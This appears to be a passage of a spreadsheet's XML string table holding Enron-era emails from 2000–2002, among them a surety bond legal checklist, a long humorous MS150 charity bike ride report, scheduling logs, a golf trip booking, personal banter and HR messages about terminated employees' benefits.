    <t>FW: Attachment</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Not suprising!  _x000D_
-----Original Message-----_x000D_
From: Will Oliver [mailto:woliver@rtron.com]_x000D_
Sent: Friday, October 12, 2001 12:43 PM_x000D_
Subject: FW: Attachment_x000D_
_x000D_
_x000D_
_x000D_
&gt; The link below is an op-ed piece in today's Orlando Sentinel that_x000D_
compares_x000D_
&gt; Harvard and Texas A&amp;M._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
http://www.orlandosentinel.com/news/opinion/orl-oped-brown101101.column?co_x000D_
&gt; ll=orl%2Dopinion%2Dheadlines_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 10:18:22 -0800 (PST)</t>
  </si>
  <si>
    <t>you didnt bring it up for no reason_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 12:17 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
no it wasn't.  i told you that robyn said you should come up when i did and we could all go out.  remember buddy,  i wasn't as drunk as you were.  by the way, did you get sick on the way home?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 19, 2001 12:16 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
first of all ny was your idea_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 19, 2001 12:15 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
so are you going to tell me or just leave me hanging out here?</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 06:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'edward.sacks@enron.com', 'wendy.conwell@enron.com', 'carol.clair@enron.com'})</t>
  </si>
  <si>
    <t>RE: Surety Bond Issues</t>
  </si>
  <si>
    <t>Nothing further here._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  St Clair, Carol  _x000D_
Sent: Tuesday, May 29, 2001 2:07 PM_x000D_
To: Sacks, Edward; Conwell, Wendy; Bouillion, James L._x000D_
Cc: jklauber@llgm.com_x000D_
Subject: Surety Bond Issues_x000D_
_x000D_
Below is a summary of the surety bond issues that I believe we need to _x000D_
resolve in order to feel comfortable accepting it as a form of collateral to _x000D_
secure a counterparty's obligations with respect to physical power purchase _x000D_
and sale transactions:_x000D_
_x000D_
1.  Determine whether an issuer can refuse to honor a draw made under a _x000D_
surety bond if after issuance, it determines that the bond was issued in _x000D_
violation of the appleton statute.  What type of legal comfort should we _x000D_
receive from the issuer at the outset to get comfortable that the bond was _x000D_
validly issued and is enforceable against such issuer?_x000D_
_x000D_
2. Determine the proper minimum credit rating(s) that should apply to the _x000D_
issuer._x000D_
_x000D_
3. In the form of bond that we were given, the "Now Therefore" language in _x000D_
the third paragraph is not acceptable.  Determine what can be said in its _x000D_
place to establish the necessary linkage back to the transaction covered by _x000D_
the Confirmation._x000D_
_x000D_
4. Make sure that the bond can be drawn down no matter what type of Event of _x000D_
Default occurs, even if such event is not related to the transaction that the _x000D_
bond references.  The Notice of Claim language needs to be written more _x000D_
generically to accommodate this. _x000D_
_x000D_
5. Does credit need a "pre-bankruptcy" trigger that would require Reliant to _x000D_
convert all outstanding bonds into LC's or cash collateral?  If so, what _x000D_
would this trigger be?_x000D_
_x000D_
Let me know if you have any additional issues.  I will be discussing some of _x000D_
these with our outside counsel shortly.     _x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 03:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.hardy@enron.com'})</t>
  </si>
  <si>
    <t>Re: Ex-Im Changes</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, Chris.  I am both Vice Chair of the NFTC Export Finance Committee and _x000D_
Chairing the NFTC/CEE Transition effort on the Finance agencies with Ed Rice _x000D_
and Mary Irace. _x000D_
_x000D_
_x000D_
_x000D_
	Chris Long@ENRON_x000D_
	12/12/2000 09:55 AM_x000D_
		 _x000D_
		 To: John Hardy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 cc: Linda Robertson/NA/Enron@ENRON, Lora Sullivan/Corp/Enron@ENRON_x000D_
		 Subject: Ex-Im Changes_x000D_
_x000D_
Linda - Asked if we were following the Ex-Im and OPIC policy issues because _x000D_
she is seeing all the e-mails from CEE and NFTC on the different activities _x000D_
of both organizations.  I told Linda you were the lead on this and all issues _x000D_
that deal with the MFAs, and that you served in a leadership role at the _x000D_
NFTC.  Please let me know if you need any suport from my side.  _x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 Jan 2002 12:20:52 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'timothy.coffing@enron.com', 'pete.davis@enron.com', 'settlements.ees@enron.com', 'serena.bishop@enron.com', 'chris.mallory@enron.com', 'phillip.platter@enron.com', 'jeffrey.jackson@enron.com', 'jeff.richter@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>EES CA SCHEDULE for 1/8/02</t>
  </si>
  <si>
    <t>_x000D_
The attached schedule covers Tuesday; associated text files will be posted to Sparky._x000D_
_x000D_
       _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Michael R. Frazier_x000D_
Manager_x000D_
Load Forecasting Desk_x000D_
Enron Energy Services_x000D_
Office: 713-345-3200_x000D_
Pager: 877-926-0615_x000D_
P-mail: 8779260615@skytel.com</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 03:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PEBBLE BEACH UPDATE</t>
  </si>
  <si>
    <t>Below is the availability of alternate rooms at the Inn at Spanish Bay for _x000D_
March 8-11, 2001:_x000D_
_x000D_
Forest View Room @$425/night - some double queen size currently available._x000D_
Scenic View Room @ $475/night - no double accommodations available and single _x000D_
rooms are sold out._x000D_
Ocean View Room @$525/night - some double queen size currently available._x000D_
_x000D_
If you would like to pay by credit card, I will need the type of card, _x000D_
number, name &amp; expiration date on the card.  Along with the credit card _x000D_
information, I will need to know the names of the other 3 people attending._x000D_
_x000D_
I have reserved golf for Friday, March 9th at 7:20 a.m. at Links at Spanish _x000D_
Bay and Saturday, March 10th at 12:00 p.m. at Pebble Beach Golf Links._x000D_
_x000D_
Room availability is tight so we should move on this as soon as possible.  _x000D_
Please let me know how you would like to proceed with this event._x000D_
THANKS!</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 16:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lafuze@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Jeff--nice to see you at the bike ride on Saturday, and  to meet you at the=_x000D_
 luncheon Monday honoring Jim Derrick. Thought you might be  interested in =_x000D_
the report I prepared for people who pledged to MS in connection  with the =_x000D_
bike ride over the weekend._x000D_
=20_x000D_
Several persons  who have either pledged, or are considering a pledge, to t=_x000D_
he National Multiple  Sclerosis Society have left messages or sent emails a=_x000D_
sking if I am still alive  after the MS150 charity bike ride held this past=_x000D_
 weekend. Others have asked for  a report of my experience. I am alive and =_x000D_
sore. If you are not interested in the  report, please delete this email._x000D_
=20_x000D_
First of all, for  those who have pledged or already sent you checks payabl=_x000D_
e to the National  Multiple Sclerosis Society,  thanks is an inadequate wor=_x000D_
d.  Remember  that you are helping colleagues and others, and perhaps yours=_x000D_
elf with your  contributions._x000D_
=20_x000D_
This bike ride charity event turned out to be a story  unlike anything I ev=_x000D_
er expected._x000D_
=20_x000D_
Here is my story, if  you are interested:_x000D_
=20_x000D_
BASIC  FACTS:_x000D_
=20_x000D_
1.  I did show  up for the bike ride (5:30 am Saturday)._x000D_
=20_x000D_
2.  I did start  the bike ride (7:10 am) with approximately 9400 bikers in =_x000D_
the largest charity  bike ride in the country._x000D_
=20_x000D_
3.  I did ride  my bike across the finish line in Austin the following day,=_x000D_
 some 199 miles down  the road.._x000D_
=20_x000D_
4.  I did  either ride my bike, or push it up several hills, for approx. 18=_x000D_
2 miles of the  199 mile route._x000D_
=20_x000D_
5.  I crossed  the finish line in Austin only a few minutes before the dead=_x000D_
line of 6:00 pm  on Sunday._x000D_
=20_x000D_
6.  I ended up  meeting in one way or another almost every biker on the tri=_x000D_
p.  That  resulted from the fact that I started at almost the very front of=_x000D_
 the pack of  9400 bike riders, and was passed by nearly all of them before=_x000D_
 I reached  Austin._x000D_
=20_x000D_
7.  I am  extremely pleased to have participated in the event.  I don't hav=_x000D_
e the time  to participate in such events very often, and I was fortunate t=_x000D_
o have a schedule  which opened up just in time for me to enter this  event=_x000D_
._x000D_
=20_x000D_
=20_x000D_
RANDOM GENERAL  OBSERVATIONS:_x000D_
=20_x000D_
1.  The charity  event title, "MS150", is a misnomer.  When I signed up for=_x000D_
 this event, I  understood the "150" part of the event title to refer to th=_x000D_
e mileage between  Houston and Austin. I was wrong.  The "150" I now unders=_x000D_
tand to mean the  approximate number of blisters to be found on one's poste=_x000D_
rior when a biker  crosses the finish line. =20_x000D_
=20_x000D_
2.  I have  driven from Houston to Austin many times in the past.  There ar=_x000D_
e routes  between the two cities that are generally flat with hills of a ge=_x000D_
ntle  grade.  We took a different route._x000D_
=20_x000D_
3.  The ride  from Houston to Austin by car is about 160 miles. The route w=_x000D_
e took was almost  40 miles further.  The bike ride route displayed on a ma=_x000D_
p appeared  similar to that which you might expect to be drawn by asking an=_x000D_
 Aggie to find  the shortest distance between two points._x000D_
=20_x000D_
4.  Road kill  if far more attractive from a car than from a bike._x000D_
=20_x000D_
5.  The chicken  ranch in LaGrange is long gone, but the spirit lingers.  T=_x000D_
he  LaGrange fair gounds was the venue for dinner and lodging at the end of=_x000D_
 the  first day of biking. We were welcomed there by the local Rotary Club =_x000D_
 volunteers with a scrumptuous dinner of barbecued chicken and salad with r=_x000D_
anch  dressing.  I laughed out loud when I saw the meal being served, and  =_x000D_
wondered whether the historical connection was  intentional.=20_x000D_
=20_x000D_
STRATEGY_x000D_
=20_x000D_
I knew when I signed  up for this event that I had almost no chance of comp=_x000D_
leting the ride which, at  the time I entered, I thought was only 150 miles=_x000D_
.  I had not trained at all  for the bike ride, and was (and am) not physic=_x000D_
ally fit and dont exercise as I  should.  The total extent of my bike ridin=_x000D_
g during the year prior to  the event was when rode my mountain bike from m=_x000D_
y home to a  sporting goods store to buy supplies one week before the trip.=_x000D_
  Round trip,  my "training" ride to the sporting goods store was about 3  =_x000D_
miles._x000D_
=20_x000D_
I sufficiently  realistic to know that I needed a strategy to gain some adv=_x000D_
antage  to make up for the lack of althletic readiness.  I came up with wha=_x000D_
t I  thought was the perfect solution. Before the race started, I looked fo=_x000D_
r the  largest biker I could spot.  My plan was that if I rode my bike duri=_x000D_
ng  the ride immediately behind a very large person, I could draft that per=_x000D_
son  (Nascar style), and gain a considerable aerodynamic advantage.  I thou=_x000D_
ght  it was a terrific idea and I figured that even if the large person had=_x000D_
 a slower  pace than I desired, the advantage would be apparent by the end =_x000D_
of the  ride.  Luckily, I found just the person I was seeking---this person=_x000D_
  appeared to be about 300-325 pounds--a body that would clear a nice swath=_x000D_
  of air for me to follow.  When the race started, I maneuvered my bike and=_x000D_
  pulled immediately behind the biker who was to be my air blocker.    For =_x000D_
the first 5 minutes of the ride, my strategy worked great--I actually could=_x000D_
  tell that my air resistance was considerable less when I was directly  be=_x000D_
hind this large person.  Then, the unexpected happened----my large person  =_x000D_
biker turned on her afterburners and left me in the dust.  Never again on  =_x000D_
this bike ride was I again able to catch and draft another  biker._x000D_
=20_x000D_
I needed a new  strategy---perhaps a tail wind, which did in fact materiali=_x000D_
ze in spades,   but not before noon the second day of the ride._x000D_
=20_x000D_
=20_x000D_
THE RIDE IN  DETAIL_x000D_
=20_x000D_
I signed up for this  event about two weeks in advance of the ride as a res=_x000D_
ult of my schedule  opening up unexpectedly when it was previously heavily =_x000D_
commited.  I  did it largely on  a lark, but the event took on new meaning =_x000D_
when I  learned of close friends who have been stricken with MS after I sta=_x000D_
rted the fund  raising effort, which is a required part of participating as=_x000D_
 a  rider._x000D_
=20_x000D_
Iknew I was  out of shape and had been asked by friends if I had gone loco =_x000D_
in even attempting  this strenuous activity.  I agreed that I could not kee=_x000D_
p up the normal pace  of younger and far more physically fit bikers.  So, I=_x000D_
 made a pledge to  myself.  No matter what, I was not going to overexert my=_x000D_
self.  I would  establish a reasonable pace and not even get close to being=_x000D_
 winded.  I  succeeded in executing this plan until lunch on the first day =_x000D_
of the  ride._x000D_
=20_x000D_
I kept a pace that  was clearly nonstrenous and I felt good about the ride =_x000D_
for the first 4  hours or so, which was mostly level road.  I was very happ=_x000D_
y with the ride,  and was looking forward to the tasty box lunch that the a=_x000D_
nnouncer has  promised at the start of the day was waiting for every biker =_x000D_
when we reached  Bellville, about 50 miles from Houston.  When I got to Bel=_x000D_
lville, I came to  realize that my pace, although not strenous, was substan=_x000D_
tially off the  mark.  With a box lunch prepared for over 9000 riders, ther=_x000D_
e were only four  box lunches left when I arrived in Bellville. As I though=_x000D_
t back, I  remembered being passed by many bikers.  I  did pass, by my coun=_x000D_
t,  9 bikes before lunch as if they were standing still.  They were.   They=_x000D_
 all had flat tires.   I decided I needed to pick up the pace  at little af=_x000D_
ter lunch._x000D_
=20_x000D_
I headed out after a  quick lunch to try to make up some time.  By around 2=_x000D_
:00 to 3:00, I  was really getting tired and although still cautious about =_x000D_
over exertion, I was  losing energy fast. I stopped at a pay phone booth in=_x000D_
  a small town, and  called home. I told my 13 year old son William I did n=_x000D_
ot think I would make it  much further.  But I wanted to go as far as I cou=_x000D_
ld.  I rode about 10  more miles, and was almost totally out of steam when =_x000D_
I remember thinking  "I desparately need a long rest".  About that time, I =_x000D_
looked up at  a road sign that said "Cemetery, next exit".  The symbolic co=_x000D_
nnection  was compelling!  I decided it was time to take a rest--a temporar=_x000D_
y,  not a permanent, one.  I biked past the cemetery where I lay down in  s=_x000D_
ome high grass along the road to catch my breath. The local chiggars and I =_x000D_
 bonded almost immediately.  I then flagged down a "SAG" bus, designed  to =_x000D_
pick up weary bikers, and got help loading first my bike, then my body, int=_x000D_
o  a van.  I remember telling the driver that I was "finished" and that I d=_x000D_
id  not think I could bike anymore for the rest of the way to Austin.  I wa=_x000D_
s  extremely disappointed because I had gone only about 62 miles, and about=_x000D_
 80% of  the donations pledged to me were based on distance traveled.  I co=_x000D_
ncluded I  was destined to fall far short of my fundraising goal._x000D_
=20_x000D_
After traveling in  the van for about 15 miles, we came upon the entrance t=_x000D_
o a ranch of a  friend of mine that I had visited only a couple weeks ago. =_x000D_
I asked the van  driver to let me out so that I could see if my friend was =_x000D_
home.  I went to  visit the friend, but he was not at his ranch house, and =_x000D_
I ended up spending  about an hour taking a nap while waiting for him.  I f=_x000D_
inally decided to  leave, and found that the rest had given me new strength=_x000D_
.  I thought I  might be able to ride again.  To make a long story short, I=_x000D_
 rode for about  another 4 hours straight until it was total dark.  A van c=_x000D_
ame and picked me  up on the highway and told me it was too dark to continu=_x000D_
e. I was only 3 miles  short of LaGrange, our stopover spot for the night, =_x000D_
and the van carried me on to  this historic spot._x000D_
=20_x000D_
I had really been  looking forward to reaching LaGrange because I was a mem=_x000D_
ber of Team Enron, and  Enron's hospitality for its bike riders was by repu=_x000D_
tation, outstanding.   They had hired 40 messeuses to give massages to the =_x000D_
Team Enron bikers, and a  dinner fit for a king would be waiting.  Unfortun=_x000D_
ately, by the time I  arrived at the LaGrange Fair Grounds, our accomodatio=_x000D_
ns for the evening, dinner  in the Enron tent was over and all the masseuse=_x000D_
s had vanished.  I finally  found a general meal service hosted by the loca=_x000D_
l Rotarians who were serving  barbecued chicken, and a salad with ranch dre=_x000D_
ssing._x000D_
=20_x000D_
Since I didnt enter  the bike event until less than two weeks before it sta=_x000D_
rted, Team Enron's private  tent was full and I was relegated to find sleep=_x000D_
ing space on my own.  I was  directed to a huge feedlot covered with a larg=_x000D_
e tin roof, open air style (no  walls).   As I nestled in my sleeping bag u=_x000D_
nder the big roof with  about 2000 other bikers, my senses told me that I w=_x000D_
as probably to sleep where a  cow going to market had probably slept only d=_x000D_
ays before.  But I was dog  tired, simply wanted to sleep, and didnt have t=_x000D_
he energy to find less aeromatic,  alternative, accomodations. =20_x000D_
=20_x000D_
=20_x000D_
THE SECOND  DAY_x000D_
=20_x000D_
=20_x000D_
I was told that  breakfast would be served at 530 am the next morning, and =_x000D_
that the ride would  start at sunup, about 640 am.  I concluded that I coul=_x000D_
d sleep until 6 am,  grab a quick bite, and still be at the starting gate b=_x000D_
y 640.  Needless to  say, I was happy with my plan to get as much sleep as =_x000D_
possible.  I badly  needed the rest. My plan failed._x000D_
=20_x000D_
I did not take into  consideration that I was sleeping among a bunch of gun=_x000D_
g-ho superbikejocks.   About 4 am, some two hours before I planned to wake =_x000D_
up, a large group of  overenenergetic-supercyclists arose and started doing=_x000D_
 side straddle hops,  stretching, and various exercises while making Monica=_x000D_
 Seles-like grunting  noises.  I was not amused.  There was no way to go ba=_x000D_
ck to sleep! The  five hours of sleep I managed on Saturday night was wholl=_x000D_
y  inadequate._x000D_
=20_x000D_
I was told that Day  2 of the bike ride was much more difficult than Day 1 =_x000D_
because of the more hilly  route as we approached Austin.  To make a long s=_x000D_
tory short,  I  actually gained strength on Day 2 as compared to Day 1. I a=_x000D_
ctually learned some  technique for transferring power from my arms to my l=_x000D_
egs, and made it to Austin  on my own power without any motorized help of a=_x000D_
ny kind._x000D_
=20_x000D_
The ride through the  hill country was spectacular.  Also, I did get a tast=_x000D_
e of ole country Texas  along the way. The bike route intentionally  meande=_x000D_
rs via remote roads through small towns in order to avoid heavy  highway tr=_x000D_
affic for the safety of the bikers.  As we passed through one  small town t=_x000D_
hat I never heard of before, I looked up to see a sign that  said  "THELMA'=_x000D_
S PLACE---POOL, BEER DOMINOS". A sign of equal size  immediately adjacent s=_x000D_
aid "NO GUNS PERMITTED INSIDE".  It was  comforting to know that patrons of=_x000D_
 that establishment could drink  peacefully while game playing, knowing tha=_x000D_
t customers are  required to  go out to the parking lot to resolve domino d=_x000D_
isagreements where guns are not  prohibited. I guess I have spent too  much=_x000D_
 time in the major metropolitan areas of Texas, and have forgotten about th=_x000D_
e  genuine Texas back country!!=20_x000D_
=20_x000D_
=20_x000D_
There was one other  noteworthy diversion.  Cycling through Bastrop State P=_x000D_
ark is known to be  one of the most strenous parts of the trip because of t=_x000D_
he extreme winding hills  in this beautiful, heavily-wooded area.  The Park=_x000D_
 is also confusing  because of its multiple intersecting roads through the =_x000D_
park. I was  following another biker as we approached the park who was spor=_x000D_
ting a very fancy  biking shirt on which was written TAM Cycling Club.  I m=_x000D_
entioned to him  that I was not looking forward to entering Bastrop State P=_x000D_
ark because of the  challenging steep hills.  He responded that he knew a r=_x000D_
oute through  the park that was not only less hilly, but was also 3 miles s=_x000D_
horter than  the route intended for the bikers.  I was all ears to the pros=_x000D_
pect of a  short cut, and agreed to follow him on this less strenuous and s=_x000D_
horter  route.  We entered the park and,  for the next 10 miles according t=_x000D_
o  my odometer, it seemed like a roller coaster ride, with turning steep in=_x000D_
clines,  and dangerously steep and turning declines.  Exactly one hour and =_x000D_
ten  minutes after we entered the park, we finally exited the park---------=_x000D_
-----at  the exact same place where we entered.  I was exhausted and not  a=_x000D_
mused.  I should have known that an Aggie inherently is unable to find the =_x000D_
 shortest route to Austin._x000D_
=20_x000D_
To fast forward the  story, since this has been far too long already, I mad=_x000D_
e it to Austin on my own  power and did not ask for a lift at all the secon=_x000D_
d day.  I was looking  forward to getting a much needed shower when I arriv=_x000D_
ed at the finishing line  at the UT baseball stadium in Austin.  I had put =_x000D_
in my most strenuous  effort during the last hour of the bike ride in the v=_x000D_
ery hilly Austin area where  every hill looks like Mount Everest or its kis=_x000D_
sing cousin.  Unfortunately  for the person who sat next to me on the bus c=_x000D_
oming back to Houston, I was  told just after crossing the finish line that=_x000D_
 the last bus would leave  for Houston in only a few minutes and there was =_x000D_
no time to  shower.  At that point in time, I looked like I just stepped ou=_x000D_
t of a sweat  shower.  The stranger next to me on the bus did exactly what =_x000D_
I dreaded--he  introduced himself, and waited for a reply.  I really didn't=_x000D_
 want this guy  to know my name--the name  of the guy who was giving the bu=_x000D_
s the aroma  of gymnasium locker room---- so after a moments thought, I hel=_x000D_
d out my still  sweaty hand, and proudly said, "Howdy, my name's Harry  Rea=_x000D_
soner."_x000D_
=20_x000D_
Conclusion:_x000D_
=20_x000D_
I participated in  this event because I wanted to help my colleagues and ot=_x000D_
hers who are victims of  MS.  If you previously made one of those weirdo pl=_x000D_
edges that are impossible  for anyone to calculate, please send my secretar=_x000D_
y a check made payable to  National Multiple Sclerosis Society in whatever =_x000D_
amount makes you happy.  If  you have not made a donation, won't you do so =_x000D_
today? You will benefit by giving  as much as the people with MS who need y=_x000D_
our help.  Thank  you._x000D_
=20_x000D_
=20_x000D_
=20_x000D_
=20_x000D_
=20_x000D_
=20_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 13:37:27 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/9/02; HourAhead hour: 16;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/9/02; HourAhead hour: 16;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010916.txt</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 21:43:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'consumerinfo@opt29.naviantnetwork.net'})</t>
  </si>
  <si>
    <t>Free Credit Report: Get yours now</t>
  </si>
  <si>
    <t>_x000D_
     The following message was sent to you as an opt-in subscriber to The eDirect Network. We will continue to bring you valuable offers on the products and services that interest you most. If you wish to unsubscribe please click here: Unsubscribe [IMAGE]     	_x000D_
_x000D_
FREE CREDIT REPORT FIND OUT YOURS_x000D_
		[IMAGE]	_x000D_
[IMAGE]	 FREE CREDIT REPORT CLICK HERE   Whether you're looking for a new job, home mortgage, buying a car or renting an apartment, a FREE Equifax credit report can provide you with valuable information that could determine your success.  [IMAGE] [IMAGE]   [IMAGE]   	[IMAGE]	_x000D_
		[IMAGE]	_x000D_
_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 10:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">I did get the tickets in.  Don't worry about a check, just give me the money _x000D_
in NO.  I am totally siked.  Been a long couple of weeks and looking forward _x000D_
to hitting the fest early with my road dog to play some hacky and drink some _x000D_
beer before the crowd joins us.  _x000D_
PL_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Mike Jillard" &lt;mjillard@beaconelectric.com&gt; on 04/12/2001 05:09:39 PM_x000D_
To: &lt;Phillip.M.Love@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: ?_x000D_
_x000D_
_x000D_
We are getting close. Two weeks from today. Did you get the Jazz Fest_x000D_
Tickets? If we need to send you a check_x000D_
let us know!_x000D_
_x000D_
Mike_x000D_
----- Original Message -----_x000D_
From: &lt;Phillip.M.Love@enron.com&gt;_x000D_
To: &lt;mjillard@beaconelectric.com&gt;_x000D_
Sent: Thursday, April 12, 2001 3:03 PM_x000D_
Subject: Re: ?_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; That boy's heed is like sputnik.  It should have its own weather_x000D_
&gt; system...That was cruel...he will probably cry himself to sleep_x000D_
&gt; tonight...on his huge pillow._x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Aug 2000 13:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Talk to us</t>
  </si>
  <si>
    <t>Over the last several years, we've received numerous questions and candid _x000D_
comments from many of you on a wide range of topics during our eSpeak _x000D_
sessions and through the Office of the Chairman online mailbox and _x000D_
voicemail.  While eSpeak is an open, informal chat between employees and _x000D_
management, the Office of the Chairman online mailbox and voicemail box are _x000D_
designed as confidential upward feedback tools for employees who choose _x000D_
anonymity.  We are pleased that many of you have openly expressed your _x000D_
thoughts and your identity, which made it possible for us to quickly respond _x000D_
to your questions and concerns.  This is the kind of work environment we all _x000D_
must strive for at Enron, and we encourage you to continue sending us _x000D_
comments about the things that are important to you._x000D_
_x000D_
Many times, however, we wanted to respond to those of you who contacted us _x000D_
anonymously with your good ideas, observations and questions.  We now have a _x000D_
way to do this while maintaining your confidentiality.  In the future, when _x000D_
we receive an anonymous question or comment from an employee, both the _x000D_
question and our response will be posted on eMeet.  This will allow us to _x000D_
answer all the questions that we receive, and it will give other employees an _x000D_
opportunity to provide their insight, if they choose to do so, since eMeet is _x000D_
an open discussion board._x000D_
_x000D_
Remember:  You can send your questions and comments to us in two ways:_x000D_
 - email to Office of the Chairman, or_x000D_
 - Office of the Chairman voicemail box at 713-853-7294, which is a _x000D_
confidential call_x000D_
_x000D_
Promoting open and honest communication is consistent with our Vision and _x000D_
Values and absolutely vital to our continued success as a company.  So don't _x000D_
be hesitant or afraid to speak your mind.  We want to hear from you.</t>
  </si>
  <si>
    <t>Mon, 26 Jun 2000 05:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steven.kessler@db.com'})</t>
  </si>
  <si>
    <t>Tax Language</t>
  </si>
  <si>
    <t>Steve:_x000D_
Our tax folks are okay with the language that you sent me._x000D_
carol</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 02:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Welcome Note</t>
  </si>
  <si>
    <t xml:space="preserve">Please join me in welcoming Angela Cadena and Mike Danielson to Enron North _x000D_
America._x000D_
_x000D_
Angela has joined West Origination as a senior specialist. She comes to us _x000D_
from Toronto, Canada, where she did work in merchant banking for OMERS, a _x000D_
large pension fund, as well as investment banking and project finance for TD _x000D_
Securities. She is most proud of her latest project - a 15-month-old baby _x000D_
girl named Maxim. _x000D_
_x000D_
Mike has been with Enron for more than two years in East Origination and _x000D_
Enron Online. He will be based in San Francisco as a Director for West _x000D_
Origination. Mike hails from Florida and comes to us most recently from _x000D_
Houston. Please introduce yourself and make him feel at home on his frequent _x000D_
Portland visits._x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Feb 2002 13:52:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ben.asante@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'ron.matthews@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>RE: TW History</t>
  </si>
  <si>
    <t xml:space="preserve">Good Ron, very good._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Matthews, Ron  _x000D_
Sent:	Friday, February 08, 2002 3:49 PM_x000D_
To:	Donoho, Lindy_x000D_
Cc:	Asante, Ben; Alters, Dennis; Choquette, Gary_x000D_
Subject:	TW History_x000D_
_x000D_
This is very lengthy but the best I can do in a rush.  Didn't have time to research all of the times and miles of pipe but did the best I could.  If we need the details, let me know and I cna try to find them Monday._x000D_
_x000D_
Ron M._x000D_
_x000D_
_x000D_
 &lt;&lt; File: TW History.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 17:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'exec.jones@enron.com'})</t>
  </si>
  <si>
    <t>David,_x000D_
_x000D_
Marla is going to track down the issues below.  As you know, we are trying =_x000D_
our best to address issues like these once we are aware of them. =20_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Robert_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Barnard, Marla =20_x000D_
Sent:=09Wednesday, January 02, 2002 4:25 PM_x000D_
To:=09Beck, Sally; Jones, Robert W.- HR Exec_x000D_
Subject:=09RE: Terminated Employees' Benefits_x000D_
_x000D_
The Net Works HR team is working daily with individuals to get their record=_x000D_
s accurate as well as communicate as much information as we can.  Hector, m=_x000D_
yself or Laura Kinningham would be more than happy to get the names of indi=_x000D_
viduals Sabra is referring to and offer our help. =20_x000D_
_x000D_
Sally, can I contact Sabra and get the names of those to whom she is referr=_x000D_
ing or let her know she can tell them to call me?  I think it has helped to=_x000D_
 have an HR generalist people can call to help them._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Beck, Sally =20_x000D_
Sent:=09Wednesday, January 02, 2002 4:14 PM_x000D_
To:=09Jones, Robert W.- HR Exec; Barnard, Marla_x000D_
Subject:=09FW: Terminated Employees' Benefits_x000D_
_x000D_
What are our communications with terminated employees and are there adminis=_x000D_
trative obstacles impacting them as the note below would indicate?    If th=_x000D_
ere is a backlog of info regarding employee status, I will be happy to key =_x000D_
punch to get caught up.   I am trainable and very willing!!!  --Sally=20_x000D_
 -----Original Message-----_x000D_
From: =09Dinari, Sabra L. =20_x000D_
Sent:=09Wednesday, January 02, 2002 1:17 PM_x000D_
To:=09Dietrich, Janet; Oxley, David; Beck, Sally; Hall, Bob M; Olson, Cindy=_x000D_
; Kitchen, Louise_x000D_
Subject:=09Terminated Employees' Benefits_x000D_
_x000D_
Happy New Year all,_x000D_
_x000D_
I have been with Enron for over 16 years and I have made some very good fri=_x000D_
ends during my time here and right now I am feeling their pain and panic.  =_x000D_
I talk to several of my terminated friends (and sister) each week and get u=_x000D_
pdates from them on what is going on outside of Enron.  I just want to do w=_x000D_
hatever I can to help them get through these hard times, this is the reason=_x000D_
 for my weekly reminders to you all who have the power to do something for =_x000D_
them._x000D_
_x000D_
